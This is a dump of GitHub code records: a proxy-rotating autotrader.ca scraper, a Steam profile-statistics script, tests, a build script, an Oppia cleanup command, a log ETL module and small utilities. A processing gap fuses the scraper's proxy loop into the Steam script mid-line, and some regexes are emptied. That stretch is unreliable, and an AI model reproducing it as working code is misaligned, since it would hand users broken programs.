details[:details.index('lists')] + details[details.index('city'):]\n\t\t\tdetails[details.index('city')+1] = re.sub('}','',details[details.index('city')+1])\n\n\t\t\t#collect remaining data from id=\"vdp-specs-content\"\n\t\t\tself.bsParse = self.bsObj.findAll('div',{'id':'vdp-specs-content'})\n\t\t\ttry:\n\t\t\t\tself.bsParse = re.sub('\\\\n|||',' ',str(self.bsParse[0]).lower())\n\t\t\texcept:\n\t\t\t\tlogging.warning('Extra details id=\"vdp-specs-content\" are not available in source for this listing at url: {}'.format(link))\n\t\t\t\tcontinue\n\n\t\t\tself.bsParse = re.split('||',self.bsParse)\n\t\t\tfor item in range(len(self.bsParse)): self.bsParse[item] = self.bsParse[item].strip()\n\n\t\t\tdetails = details + self.bsParse\n\t\t\t#add to vehicle_details dict\n\t\t\tfor key in vehicle_details:\n\t\t\t\tindex = details.index(key)\t\t\t\t\t#TODO: error handling on .index()\n\t\t\t\tvehicle_details[key] = details[index+1]\n\n\t\t\tself.vehicles.append(vehicle_details)\n\n\t\tself.links = []\n\t\treturn self.vehicles\n\n\tdef run(self):\n\n\t\tlast_page = False\n\t\tprint('starting {} ...'.format(self.getName()))\n\t\tself.path = Q.get()\n\t\tself.update_request(self.path)\n\n\t\twhile (last_page==False):\n\n\t\t\tself.gather_links()\n\t\t\tprint('{} gathered link details ...'.format(self.getName()))\n\t\t\tvehicles = self.gather_details()\n\t\t\tprint('{} gathered vehicle details ...'.format(self.getName()))\n\n\t\t\tdb_lock.acquire()\n\t\t\tprint('{} acquired the lock ...'.format(self.getName()))\n\t\t\tself.update_db(vehicles)\n\t\t\tdb_lock.release()\n\t\t\tprint('{} released the lock ...'.format(self.getName()))\n\n\t\t\t#Rotate fresh proxies\n\t\t\t#-----------------------------------------------------------------\n\t\t\tif (len(Crawler.proxies) <= 10) and (proxy_lock.acquire(False)):\n\t\t\t\tprint('{} rotating fresh proxies ...'.format(self.getName()))\n\t\t\t\tlogging.info('{} ROTATING FRESH PROXIES'.format(self.getName()))\n\t\t\t\tself.main_Q.put(True)\n\t\t\t\tfresh_proxies = self.worker_Q.get()\n\t\t\t\tCrawler.proxies += fresh_proxies\n\t\t\t\tproxy_lock.release()\n\t\t\t#-----------------------------------------------------------------\n\n\t\t\tself.path = Q.get()\n\t\t\tself.update_request(self.path)\n\n\t\t\tlast_page = self.check_page_index()\n\t\t\t#stop main loop from listening for fresh proxies\n\t\t\tif last_page: self.main_Q.put(False)\n\t\t\tprint('{} last page is {} ...'.format(self.getName(),last_page))\n\n\nif __name__ == '__main__':\n\t'''\n\tautotrader.ca search returns a maximum of 1000 indices when 100 postiings per page is set. By breaking the search\n\tinto price intervals, this allows the search to stay below the 1000 index max.\n\t'''\n\t#parse command line arguments\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument(\"-threads\",\"--threads\", type=int, default=10)\n\tparser.add_argument(\"-proxy_total\",\"--proxy_total\", type=int, default=60)\n\tparser.add_argument(\"-proxy_refresh\",\"--proxy_refresh\", type=int, default=30)\n\tparser.add_argument(\"-proxy_wait\",\"--proxy_wait\", type=int, default=30)\n\tparser.add_argument(\"-timeout\",\"--timeout\", type=int, default=0)\n\n\targs = parser.parse_args()\n\n\t#global variables\n\tprice_range = [(1001,10000),(10001,20000),(20001,30000),(30001,40000),(40001,50000),(50001,60000),\n\t\t\t\t\t(60001,70000),(70001,80000),(80001,90000),(90001,100000),(100001,200000),(200001,2000000)]\n\n\tmax_index = 1000\n\tnum_proxies = args.proxy_total\n\tcycled_proxies = args.proxy_refresh\n\ttimeout = args.timeout\n\tproxy_wait = args.proxy_wait\n\tset_threads = args.threads\n\tthreads,proxies = [],[]\n\tdb_lock = Lock()\n\tproxy_lock = Lock()\n\tmain_Q = queue.Queue()\n\tworker_Q = queue.Queue()\n\tlogging.basicConfig(filename='error.log',level=logging.INFO,format='%(asctime)s:%(threadName)s:%(levelname)s:%(message)s')\n\n\t#main loop\n\tlogging.info(\"STARTING NEW ITERATION\")\n\tfor current_range in range(len(price_range)):\n\t\tprint('-----------------------------------------------------------------------------')\n\t\tprint('populating queue for range {} ...'.format(price_range[current_range]))\n\t\tprint('-----------------------------------------------------------------------------')\n\t\tQ = get_q(current_range)\n\t\tprint('retrieving proxies ...')\n\t\tprint('-----------------------------------------------------------------------------')\n\n\t\twhile len(proxies)= 2017][\"Id\"].count())\nten_or_more_games_factor = of_total_count(dfg_gc[dfg_gc[\"count\"] >= 10].count()[\"count\"])\nfifty_or_more_games_factor = of_total_count(dfg_gc[dfg_gc[\"count\"] >= 50].count()[\"count\"])\n\nprint(\"Currently crawled users: {}\".format(total_count))\nprint(\"{}% have provided a real name\".format(real_name_factor))\nprint(\"{}% have set a country\".format(country_factor))\nprint(\"{}% provided a city and state additionally to the country\".format(city_state_country_factor))\nprint(\"{}% of the crawled users have set their profile to private\".format(private_factor))\nprint(\"{}% of the crawled users are active (Logged in at least once this year)\".format(active_account_factor))\nprint(\"{}% have 10 games or more\".format(ten_or_more_games_factor))\nprint(\"{}% have 50 games or more\".format(fifty_or_more_games_factor))\n\n# Calculate graph data and display graphs\n\n# Game count\n\n# dfg_gc[\"count\"] = pd.cut(dfg_gc[\"count\"], [0, 1, 10, 25, 50, 100, 500, 30000],\n# labels=[\"0\", \"1 - 9\", \"10 - 24\", \"25 - 49\", \"50 - 99\", \"100 - 499\", \"500 +\"])\n# ax = sns.countplot(x=dfg_gc[\"count\"])\n# ax.set(xlabel=\"Game count\", ylabel=\"Number of players\")\n\n\n# Friend count\n\ndff_gc[\"friendcount\"] = pd.cut(dff_gc[dff_gc[\"friendcount\"] <= 50], [1, 50, 100, 150, 200, 250, 300, 350, 400, 999999],\n labels=[\"1 - 49\", \"50 - 99\", \"100 - 149\", \"150 - 199\", \"200 - 249\", \"250 - 299\",\n \"300 - 349\", \"350 - 399\", \"400+\"])\n\naxf = sns.countplot(x=dff_gc[\"friendcount\"])\naxf.set(xlabel=\"Friend count\", ylabel=\"Number of players\")\nfor item in ([axf.title, axf.xaxis.label, axf.yaxis.label] +\n axf.get_xticklabels() + axf.get_yticklabels()):\n item.set_fontsize(20)\nplt.show()\n","repo_name":"shiaky/mining_steam","sub_path":"code/data_explorer.py","file_name":"data_explorer.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5379032926","text":"import os, sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../..\"))\nimport unittest\nfrom sorting_searching.peak_element import PeakElement\n\nclass TestPeakElement(unittest.TestCase):\n def setUp(self):\n self.func = PeakElement()\n\n def test_1(self):\n nums = [1,2,3,1]\n expected = 2\n self.assertEqual(self.func.findPeakElement(nums), expected)\n\n def test_2(self):\n nums = [1,2,1,3,5,6,4]\n expected = [1, 5]\n self.assertIn(self.func.findPeakElement(nums), expected)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/test/sorting_searching_test/test_peak_element.py","file_name":"test_peak_element.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20714453982","text":"#!/usr/bin/env python3\n#coding=utf-8\nimport os, sys\n\n\nDIR_UTILIDADES=\"..\" + os.sep + \"utilidades\" + os.sep + \"src\"\nprint (DIR_UTILIDADES)\n\n\nsys.path.insert(0, DIR_UTILIDADES)\nfrom utilidades.ficheros.GestorFicheros import GestorFicheros\ngf=GestorFicheros()\n\ngf.ejecutar_comando(\"./descargador_html.py\", \"\")\ngf.ejecutar_comando(\"./procesador_centros.py\", \">\", \"centros_region.sql\")\ngf.ejecutar_comando (\"cat centros_region.sql\", \"|\", \"sqlite3 ../../docencia.db\")\n","repo_name":"OscarMaestre/pruebas_proceso","sub_path":"descargador_html/dodo.py","file_name":"dodo.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20556580579","text":"# coding: utf-8\n\n\"\"\"\nManagement command to clean up any old files in the oppia uploads directory\n\"\"\"\nimport os\nimport shutil\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom oppia.models import Course\n\n\nclass Command(BaseCommand):\n help = \"Cleans up any old files in the oppia uploads and courses directory\"\n\n def handle(self, *args, **options):\n self.remove_no_matching_courses()\n self.remove_courses_no_file()\n self.remove_old_expanded_folders()\n\n def remove_no_matching_courses(self):\n \"\"\"\n Remove files that don't have matching courses\n \"\"\"\n files = os.listdir(settings.COURSE_UPLOAD_DIR)\n for filename in files:\n if filename.endswith(\".zip\"):\n # find out if it's a live course file\n courses = Course.objects.filter(filename=filename)\n if courses.count() == 0:\n # delete the file\n os.remove(os.path.join(settings.COURSE_UPLOAD_DIR,\n filename))\n self.stdout.write(\"Removed: \" + filename)\n\n def remove_courses_no_file(self):\n \"\"\"\n Flag up courses that don't have files\n \"\"\"\n courses = Course.objects.all()\n for course in courses:\n if not os.path.isfile(os.path.join(settings.COURSE_UPLOAD_DIR,\n course.filename)):\n self.stdout \\\n .write(\"FILE MISSING: %s for %s \" % (course.filename,\n course.title))\n\n def remove_old_expanded_folders(self):\n \"\"\"\n Remove old expanded folders from media/courses\n \"\"\"\n try:\n files = os.listdir(os.path.join(settings.MEDIA_ROOT, 'courses'))\n for filename in files:\n if os.path.isdir(\n os.path.join(settings.MEDIA_ROOT,\n 'courses',\n filename)):\n courses = Course.objects.filter(shortname=filename)\n if courses.count() == 0:\n shutil.rmtree(os.path.join(settings.MEDIA_ROOT,\n 'courses',\n filename))\n self.stdout.write(\"Removed: \" + filename)\n except FileNotFoundError: # dir doesn;t exsit\n pass\n","repo_name":"DigitalCampus/django-oppia","sub_path":"oppia/management/commands/cleanup_uploads.py","file_name":"cleanup_uploads.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"29582603882","text":"import copy\nfrom typing import Union\n\nfrom django.core.cache import cache\nfrom django.conf import settings\nfrom django.utils.module_loading import import_string\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom apps.api import TransferApi\nfrom apps.exceptions import ValidationError, ApiResultError\nfrom apps.log_databus.constants import BKDATA_ES_TYPE_MAP, EtlConfig, FIELD_TEMPLATE, CACHE_KEY_CLUSTER_INFO\nfrom apps.log_databus.exceptions import EtlParseTimeFieldException, HotColdCheckException\nfrom apps.log_databus.handlers.collector_scenario import CollectorScenario\nfrom apps.log_databus.models import CollectorConfig, CollectorPlugin\nfrom apps.log_databus.utils.es_config import get_es_config\nfrom apps.log_search.constants import FieldBuiltInEnum, FieldDataTypeEnum\nfrom apps.utils import is_match_variate\n\n\nclass EtlStorage(object):\n \"\"\"\n 清洗入库\n \"\"\"\n\n # 子类需重载\n etl_config = None\n separator_node_name = \"bk_separator_object\"\n\n @classmethod\n def get_instance(cls, etl_config=None):\n mapping = {\n EtlConfig.BK_LOG_TEXT: \"BkLogTextEtlStorage\",\n EtlConfig.BK_LOG_JSON: \"BkLogJsonEtlStorage\",\n EtlConfig.BK_LOG_DELIMITER: \"BkLogDelimiterEtlStorage\",\n EtlConfig.BK_LOG_REGEXP: \"BkLogRegexpEtlStorage\",\n }\n try:\n etl_storage = import_string(\n \"apps.log_databus.handlers.etl_storage.{}.{}\".format(etl_config, mapping.get(etl_config))\n )\n return etl_storage()\n except ImportError as error:\n raise NotImplementedError(f\"{etl_config} not implement, error: {error}\")\n\n @classmethod\n def get_etl_config(cls, result_table_config, default=\"bk_log_text\"):\n \"\"\"\n 根据RT表配置返回etl_config类型\n \"\"\"\n separator_node_action = result_table_config.get(\"option\", {}).get(\"separator_node_action\")\n return {\"regexp\": \"bk_log_regexp\", \"delimiter\": \"bk_log_delimiter\", \"json\": \"bk_log_json\"}.get(\n separator_node_action, default\n )\n\n def etl_preview(self, data, etl_params) -> list:\n \"\"\"\n 字段提取预览\n :param data: 日志原文\n :param etl_params: 字段提取参数\n :return: 字段列表 list\n \"\"\"\n raise NotImplementedError(_(\"功能暂未实现\"))\n\n def get_bkdata_etl_config(self, fields, etl_params, built_in_config):\n raise NotImplementedError(_(\"功能暂未实现\"))\n\n def get_result_table_config(self, fields, etl_params, built_in_config, es_version=\"5.X\"):\n \"\"\"\n 配置清洗入库策略,需兼容新增、编辑\n \"\"\"\n raise NotImplementedError(_(\"功能暂未实现\"))\n\n def get_result_table_fields(self, fields, etl_params, built_in_config, es_version=\"5.X\"):\n \"\"\"\n META\n \"\"\"\n # field_list\n field_list = built_in_config.get(\"fields\", [])\n etl_flat = etl_params.get(\"etl_flat\", False)\n\n # 是否保留原文\n if etl_params.get(\"retain_original_text\"):\n field_list.append(\n {\n \"field_name\": \"log\",\n \"field_type\": \"string\",\n \"tag\": \"metric\",\n \"alias_name\": \"data\",\n \"description\": \"original_text\",\n \"option\": {\"es_type\": \"text\", \"es_include_in_all\": True}\n if es_version.startswith(\"5.\")\n else {\"es_type\": \"text\"},\n }\n )\n\n # 默认使用上报时间做为数据时间\n time_field = built_in_config[\"time_field\"]\n built_in_keys = FieldBuiltInEnum.get_choices()\n\n etl_field_index = 1\n clustering_default_fields = self._get_log_clustering_default_fields()\n for field in fields:\n # 当在聚类场景的时候 不做下面的format操作\n if etl_flat and field[\"field_name\"] in clustering_default_fields:\n field_list.append(field)\n continue\n # 过滤掉删除的字段\n if field[\"is_delete\"]:\n continue\n\n # 设置字段的来源与目标存储\n source_field = field[\"field_name\"]\n target_field = field[\"field_name\"]\n if field.get(\"alias_name\") and self.etl_config in [EtlConfig.BK_LOG_JSON]:\n target_field = field[\"alias_name\"]\n\n if target_field.lower() in built_in_keys:\n raise ValidationError(_(\"字段不能与标准字段重复\") + f\":{target_field}\")\n\n if not is_match_variate(target_field):\n raise ValidationError(_(\"字段名不符合变量规则\"))\n\n # option, 非时间字段的option里的time_zone和time_format都为\"\", 不需要入库\n field_option = {k: v for k, v in field.get(\"option\", {}).items() if k not in [\"time_zone\", \"time_format\"]}\n field_option[\"field_index\"] = etl_field_index\n etl_field_index += 1\n\n # ES_TYPE\n field_option[\"es_type\"] = FieldDataTypeEnum.get_es_field_type(\n field[\"field_type\"], is_analyzed=field[\"is_analyzed\"]\n )\n if field[\"is_analyzed\"] and field.get(\"option\", {}).get(\"es_analyzer\"):\n field_option[\"es_analyzer\"] = field[\"option\"][\"es_analyzer\"]\n\n # ES_INCLUDE_IN_ALL\n if field[\"is_analyzed\"] and es_version.startswith(\"5.\"):\n field_option[\"es_include_in_all\"] = True\n\n # ES_DOC_VALUES\n field_option[\"es_doc_values\"] = field[\"is_dimension\"]\n\n if not etl_flat:\n # REAL_PATH\n field_option[\"real_path\"] = f\"{self.separator_node_name}.{source_field}\"\n\n # 时间字段处理\n if field[\"is_time\"]:\n time_field[\"alias_name\"] = source_field\n time_field[\"option\"][\"real_path\"] = field_option[\"real_path\"]\n time_field[\"option\"][\"time_zone\"] = field[\"option\"][\"time_zone\"]\n time_field[\"option\"][\"time_format\"] = field[\"option\"][\"time_format\"]\n time_field[\"option\"][\"field_index\"] = field_option[\"field_index\"]\n # 删除原时间字段配置\n field_option[\"es_doc_values\"] = False\n\n # 加入字段列表\n field_list.append(\n {\n \"field_name\": target_field,\n \"field_type\": FieldDataTypeEnum.get_meta_field_type(field_option[\"es_type\"]),\n \"tag\": \"dimension\" if field_option.get(\"es_doc_values\", True) else \"metric\",\n \"description\": field.get(\"description\"),\n \"option\": field_option,\n }\n )\n\n field_list.append(time_field)\n return {\"fields\": field_list, \"time_field\": time_field}\n\n def update_or_create_result_table(\n self,\n instance: Union[CollectorConfig, CollectorPlugin],\n table_id: str,\n storage_cluster_id: int,\n retention: int,\n allocation_min_days: int,\n storage_replies: int,\n fields: list = None,\n etl_params: dict = None,\n es_version: str = \"5.X\",\n hot_warm_config: dict = None,\n es_shards: int = settings.ES_SHARDS,\n index_settings: dict = None,\n ):\n \"\"\"\n 创建或更新结果表\n :param instance: 采集项配置/采集插件\n :param table_id: 结果表ID\n :param storage_cluster_id: 存储集群id\n :param retention: 数据保留时间\n :param allocation_min_days: 执行分配的等待天数\n :param storage_replies: 存储副本数量\n :param fields: 字段列表\n :param etl_params: 清洗配置\n :param es_version: es\n :param hot_warm_config: 冷热数据配置\n :param es_shards: es分片数\n :param index_settings: 索引配置\n \"\"\"\n from apps.log_databus.handlers.collector import build_result_table_id\n\n # ES 配置\n es_config = get_es_config(instance.get_bk_biz_id())\n\n # 时间格式\n date_format = es_config[\"ES_DATE_FORMAT\"]\n\n # ES-分片数\n instance.storage_shards_nums = es_shards\n\n # ES-副本数\n instance.storage_replies = storage_replies\n\n # 需要切分的大小阈值,单位(GB)\n if not instance.storage_shards_size:\n instance.storage_shards_size = es_config[\"ES_SHARDS_SIZE\"]\n slice_size = instance.storage_shards_nums * instance.storage_shards_size\n\n # index分片时间间隔,单位(分钟)\n slice_gap = es_config[\"ES_SLICE_GAP\"]\n\n # ES兼容—mapping设置\n param_mapping = {\n \"dynamic_templates\": [\n {\n \"strings_as_keywords\": {\n \"match_mapping_type\": \"string\",\n \"mapping\": {\"norms\": \"false\", \"type\": \"keyword\"},\n }\n }\n ],\n }\n if es_version.startswith(\"5.\"):\n param_mapping[\"_all\"] = {\"enabled\": True}\n param_mapping[\"include_in_all\"] = False\n\n params = {\n \"bk_data_id\": instance.bk_data_id,\n # 必须为 库名.表名\n \"table_id\": build_result_table_id(instance.get_bk_biz_id(), table_id),\n \"is_enable\": True,\n \"table_name_zh\": instance.get_name(),\n \"is_custom_table\": True,\n \"schema_type\": \"free\",\n \"default_storage\": \"elasticsearch\",\n \"default_storage_config\": {\n \"cluster_id\": storage_cluster_id,\n \"storage_cluster_id\": storage_cluster_id,\n \"retention\": retention,\n \"date_format\": date_format,\n \"slice_size\": slice_size,\n \"slice_gap\": slice_gap,\n \"mapping_settings\": param_mapping,\n \"index_settings\": {\n \"number_of_shards\": instance.storage_shards_nums,\n \"number_of_replicas\": instance.storage_replies,\n },\n },\n \"is_time_field_only\": True,\n \"bk_biz_id\": instance.get_bk_biz_id(),\n \"label\": instance.category_id,\n \"option\": {},\n \"field_list\": [],\n \"warm_phase_days\": 0,\n \"warm_phase_settings\": {},\n \"is_sync_db\": False, # ES的index创建,不做同步创建,走异步任务执行\n }\n index_settings = index_settings or {}\n params[\"default_storage_config\"][\"index_settings\"].update(index_settings)\n\n # 是否启用冷热集群\n if allocation_min_days:\n if not hot_warm_config or not hot_warm_config.get(\"is_enabled\"):\n # 检查集群是否支持冷热数据功能\n raise HotColdCheckException()\n\n # 对于新数据,路由到热节点\n params[\"default_storage_config\"][\"index_settings\"].update(\n {\n f\"index.routing.allocation.include.{hot_warm_config['hot_attr_name']}\": hot_warm_config[\n \"hot_attr_value\"\n ],\n }\n )\n # n天后的数据,路由到冷节点\n params[\"default_storage_config\"].update(\n {\n \"warm_phase_days\": allocation_min_days,\n \"warm_phase_settings\": {\n \"allocation_attr_name\": hot_warm_config[\"warm_attr_name\"],\n \"allocation_attr_value\": hot_warm_config[\"warm_attr_value\"],\n \"allocation_type\": \"include\",\n },\n }\n )\n\n # 获取清洗配置\n collector_scenario = CollectorScenario.get_instance(collector_scenario_id=instance.collector_scenario_id)\n built_in_config = collector_scenario.get_built_in_config(es_version)\n result_table_config = self.get_result_table_config(fields, etl_params, built_in_config, es_version=es_version)\n\n params.update(result_table_config)\n\n # 字段mapping优化\n for field in params[\"field_list\"]:\n # 如果datetype不支持doc_values,则不设置doc_values,避免meta判断类型不一致创建新的index\n if \"es_doc_values\" in field.get(\"option\", {}):\n if field[\"option\"][\"es_doc_values\"] or field[\"option\"][\"es_type\"] in [\"date\", \"text\"]:\n del field[\"option\"][\"es_doc_values\"]\n # 移除计分\n if \"es_type\" in field.get(\"option\", {}) and field[\"option\"][\"es_type\"] in [\"text\"]:\n field[\"option\"][\"es_norms\"] = False\n\n # 时间默认为维度\n if \"time_option\" in params and \"es_doc_values\" in params[\"time_option\"]:\n del params[\"time_option\"][\"es_doc_values\"]\n\n # 获取结果表是否已经创建,如果创建则选择更新\n table_id = \"\"\n try:\n table_id = TransferApi.get_result_table({\"table_id\": params[\"table_id\"]}).get(\"table_id\")\n except ApiResultError:\n pass\n\n # 兼容插件与采集项\n if not table_id:\n # 创建结果表\n table_id = TransferApi.create_result_table(params)[\"table_id\"]\n else:\n # 更新结果表\n params[\"table_id\"] = table_id\n TransferApi.modify_result_table(params)\n cache.delete(CACHE_KEY_CLUSTER_INFO.format(table_id))\n\n if not instance.table_id:\n instance.table_id = table_id\n instance.save()\n\n return {\"table_id\": instance.table_id, \"params\": params}\n\n @classmethod\n def switch_result_table(cls, collector_config: CollectorConfig, is_enable=True):\n \"\"\"\n 起停result_table\n :param collector_config: 采集项\n :param is_enable: 是否有效\n :return:\n \"\"\"\n params = {\n \"bk_data_id\": collector_config.bk_data_id,\n # 必须为 库名.表名\n \"table_id\": f\"{collector_config.table_id}\",\n \"is_enable\": is_enable,\n }\n TransferApi.switch_result_table(params)\n return True\n\n @classmethod\n def parse_result_table_config(cls, result_table_config, result_table_storage=None):\n \"\"\"\n 根据meta配置返回前端格式\n :param result_table_config metadata_get_result_table\n :param result_table_storage metadata_get_result_table_storage\n \"\"\"\n\n # 存储配置 && 清洗配置\n collector_config = {\"etl_params\": result_table_config.get(\"option\", {})}\n if result_table_storage:\n collector_config[\"storage_cluster_id\"] = result_table_storage[\"cluster_config\"][\"cluster_id\"]\n collector_config[\"storage_cluster_name\"] = result_table_storage[\"cluster_config\"][\"cluster_name\"]\n collector_config[\"retention\"] = result_table_storage[\"storage_config\"].get(\"retention\")\n collector_config[\"allocation_min_days\"] = result_table_storage[\"storage_config\"].get(\"warm_phase_days\")\n\n # 字段\n built_in_fields = FieldBuiltInEnum.get_choices()\n field_list = []\n time_fields = [item for item in result_table_config[\"field_list\"] if item[\"field_name\"] == \"dtEventTimeStamp\"]\n if not time_fields:\n raise EtlParseTimeFieldException()\n time_field = copy.deepcopy(time_fields[0])\n\n # log clustering fields\n log_clustering_fields = cls._get_log_clustering_default_fields()\n for field in result_table_config[\"field_list\"]:\n # 判断是不是标准字段\n if not field.get(\"is_built_in\", False):\n field[\"is_built_in\"] = True if field[\"field_name\"].lower() in built_in_fields else False\n\n # 聚类保留字段\n if field[\"field_name\"] in log_clustering_fields:\n continue\n\n # 如果有指定别名,则需要调转位置(field_name:ES入库的字段名称;alias_name:数据源的字段名称)\n field_option = field.get(\"option\", {})\n if field_option.get(\"real_path\"):\n field[\"alias_name\"] = field_option[\"real_path\"].replace(f\"{cls.separator_node_name}.\", \"\")\n\n if field.get(\"alias_name\"):\n field[\"field_name\"], field[\"alias_name\"] = field[\"alias_name\"], field[\"field_name\"]\n\n # 如果别名与field_name相同,则不返回\n if field[\"field_name\"] == field[\"alias_name\"]:\n field[\"alias_name\"] = \"\"\n\n # 时间字段处理\n field[\"is_time\"] = False\n if field[\"field_name\"] == time_field[\"alias_name\"]:\n field[\"is_time\"] = True\n field[\"is_dimension\"] = True\n # option\n field_es_type = field[\"option\"][\"es_type\"]\n field[\"option\"] = time_field[\"option\"]\n field[\"option\"][\"time_zone\"] = int(time_field[\"option\"][\"time_zone\"])\n field[\"option\"][\"es_type\"] = field_es_type\n\n es_type = field_option.get(\"es_type\", \"keyword\")\n\n # 字段类型\n field[\"field_type\"] = FieldDataTypeEnum.get_field_type(es_type)\n\n # 分词字段设置\n field[\"is_analyzed\"] = False\n if es_type == \"text\":\n field[\"is_analyzed\"] = True\n field[\"is_dimension\"] = False\n field[\"is_delete\"] = field.get(\"is_delete\", False)\n\n # 如果未设置维度,则获取es_doc_values的值\n if \"is_dimension\" not in field:\n field[\"is_dimension\"] = field_option.get(\"es_doc_values\", True)\n if field_option.get(\"es_type\") == \"text\":\n field[\"is_dimension\"] = False\n\n field_list.append(field)\n\n # 添加删除字段\n if result_table_config[\"option\"].get(\"separator_fields_remove\"):\n fields_remove = result_table_config[\"option\"][\"separator_fields_remove\"].split(\",\")\n for field_name in fields_remove:\n field_name = field_name.strip()\n if field_name == \"\":\n continue\n\n field_info = copy.deepcopy(FIELD_TEMPLATE)\n field_info[\"field_name\"] = field_name\n field_list.append(field_info)\n\n collector_config[\"fields\"] = sorted(field_list, key=lambda x: x.get(\"option\", {}).get(\"field_index\", 0))\n return collector_config\n\n def _to_bkdata_assign(self, field):\n key = field.get(\"alias_name\")\n if not key:\n key = field.get(\"field_name\")\n return {\n \"key\": key,\n \"assign_to\": key,\n \"type\": BKDATA_ES_TYPE_MAP.get(field.get(\"option\").get(\"es_type\"), \"string\"),\n }\n\n def _to_bkdata_conf(self, time_field):\n return {\n \"output_field_name\": \"timestamp\",\n \"time_format\": time_field[\"option\"][\"time_format\"],\n \"timezone\": time_field[\"option\"][\"time_zone\"],\n \"encoding\": \"UTF-8\",\n \"timestamp_len\": 0,\n \"time_field_name\": time_field.get(\"alias_name\"),\n }\n\n def _get_bkdata_default_fields(self, built_in_fields, time_field):\n result = [\n self._to_bkdata_assign(built_in_field)\n for built_in_field in built_in_fields\n if not built_in_field.get(\"flat_field\", False)\n ]\n if not time_field.get(\"option\", {}).get(\"real_path\"):\n result.append(self._to_bkdata_assign(time_field))\n result.append(\n self._to_bkdata_assign({\"field_name\": \"time\", \"alias_name\": \"time\", \"option\": {\"es_type\": \"long\"}})\n )\n return result\n\n @classmethod\n def _get_log_clustering_default_fields(cls):\n return {field[\"field_name\"] for field in CollectorScenario.log_clustering_fields()}\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_databus/handlers/etl_storage/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":19917,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"28862100727","text":"w = float(input())\nh = float(input())\n\nw_to_cm = w*100\nh_to_cm = h*100\n\nrows = w_to_cm // 120\nh_to_cm -= 100\nburos_in_rows = h_to_cm // 70\n\nseats = rows*buros_in_rows - 3\nprint(seats)","repo_name":"yanchev93/SoftUni-Courses","sub_path":"SoftUni - Python/Python - PBasics/More exercise/PB/1_More_Excersice/5_training_lab.py","file_name":"5_training_lab.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36413492940","text":"from sklearn.cluster import KMeans,DBSCAN\r\nimport numpy as np\r\nimport scipy.io as si\r\nimport matplotlib.pyplot as plt\r\nX, Y, Z = np.loadtxt('filtereddata/XYZ_norm1.txt',skiprows=0,unpack=True)\r\nData = np.column_stack((X,Y,Z))\r\n#Z = np.hsplit(Data,np.array([80])) \r\n\r\n#kmeans =KMeans(n_clusters=2,random_state=42,max_iter=10000,n_init=100).fit(Z[0])\r\n\r\n# epsilon = np.arange(0.1,2,0.025)\r\n\r\n# for e in epsilon:\r\n\r\n# \tdbscan = DBSCAN(eps=e,algorithm='kd_tree', min_samples=2).fit(Data)\r\n# \tprint(e)\r\n# \tprint(dbscan.labels_)\r\n\r\ndbscan = DBSCAN(eps = 0.874,algorithm='kd_tree',min_samples=2).fit(Data)\r\nprint(dbscan.labels_)\r\nprint(Data.shape)\r\n\r\n\r\n\r\n# print(Z)\r\n# pred = Data[1]\r\n\r\n\r\npred = np.column_stack((Data,dbscan.labels_))\r\nprint(pred.shape)\r\n\r\n\r\nfor index in range(0,len(Z)):\r\n\tif(dbscan.labels_[index]<0):\r\n\t\tprint(index)\r\n\t\tt = np.linspace(0, 2, 64, endpoint=False)\r\n\t\tplt.plot(t, Z[index-32:index+32], 'g-', linewidth=2, label='filtered data')\r\n\t\tplt.xlabel('Time [sec]')\r\n\t\tplt.legend()\r\n\t\tplt.show()\r\n\r\n\r\n#np.savetxt('filtereddata/predictxyz1.txt',pred,fmt='%1.15g')\r\n\r\nprint(\"Prediction data ready\")","repo_name":"saainithil97/roadsafe","sub_path":"cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72637773929","text":"#! /usr/bin/env python\n\"\"\"\nConvert empty IPython notebook to a sphinx doc page.\n\"\"\"\nimport io\nimport os\nimport sys\n\nfrom IPython.nbformat import current\n\n\ndef clean_for_doc(nb):\n \"\"\"\n Cleans the notebook to be suitable for inclusion in the docs.\n \"\"\"\n new_cells = []\n for cell in nb.worksheets[0].cells:\n # Remove the pylab inline line cells.\n if \"input\" in cell and \\\n cell[\"input\"].strip().startswith(\"%pylab inline\"):\n continue\n\n # Make sure all cells are padded at the top and bottom.\n if \"source\" in cell:\n cell[\"source\"] = \"\\n\" + cell[\"source\"].strip() + \"\\n\\n\"\n\n # Remove output resulting from the stream/trace method chaining.\n if \"outputs\" in cell:\n outputs = [_i for _i in cell[\"outputs\"] if \"text\" not in _i or\n not _i[\"text\"].startswith(\"= os.path.getmtime(nbname):\n print(\"\\t%s is up to date; nothing to do.\" % rst_name)\n return\n\n os.system(\"runipy --o %s --matplotlib --quiet\" % nbname)\n\n with io.open(nbname, 'r', encoding='utf8') as f:\n nb = current.read(f, 'json')\n nb = clean_for_doc(nb)\n print(\"Writing to\", nbname)\n with io.open(nbname, 'w', encoding='utf8') as f:\n current.write(nb, f, 'json')\n\n # Convert to rst.\n os.system(\"jupyter nbconvert --to rst %s\" % nbname)\n\n with io.open(nbname, 'r', encoding='utf8') as f:\n nb = current.read(f, 'json')\n nb = strip_output(nb)\n print(\"Writing to\", nbname)\n with io.open(nbname, 'w', encoding='utf8') as f:\n current.write(nb, f, 'json')\n\nif __name__ == \"__main__\":\n for 